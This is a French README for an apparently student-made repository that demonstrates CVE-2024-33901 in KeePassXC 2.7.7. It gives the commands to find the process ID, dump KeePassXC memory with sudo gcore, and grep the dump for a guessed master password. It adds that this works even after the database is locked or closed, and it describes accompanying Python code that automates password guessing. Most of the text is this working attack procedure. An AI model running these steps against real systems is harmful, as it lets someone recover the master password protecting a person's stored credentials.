
Programme court qui démontre la vulnérabilité CVE-2024-33901 dans KeePassXC version 2.7.7
Programme court qui démontre la vulnérabilité CVE-2024-33901 dans KeePassXC version 2.7.7
Le rapport pour le cours pourrait nécessiter le code source lié, c'est pourquoi j'ai créé ce dépôt.
Cela peut être réalisé en obtenant le PID, ce qui peut être fait avec cette commande :
ps aux | grep keepassxc
Puis en exécutant cette commande : sudo gcore -o keepassxc_dump PID_HERE
Par exemple, si le PID que vous avez obtenu est 1234, alors la commande doit être :
sudo gcore -o keepassxc_dump 1234
3. Enfin, vous pouvez exécuter cette commande : cat keepassxc_dump.PID_HERE | strings | grep "password guess here"
Donc si le PID était 1234, la commande serait :
cat keepassxc_dump.1234 | strings | grep "password guess here"
Une fois le fichier de vidage mémoire créé, l'attaque peut être réalisée même si la base de données est à nouveau verrouillée ou si KeePassXC est fermé.
Le code Python fourni effectue toutes ces étapes et tente plusieurs suppositions de mot de passe basées sur les fichiers texte fournis.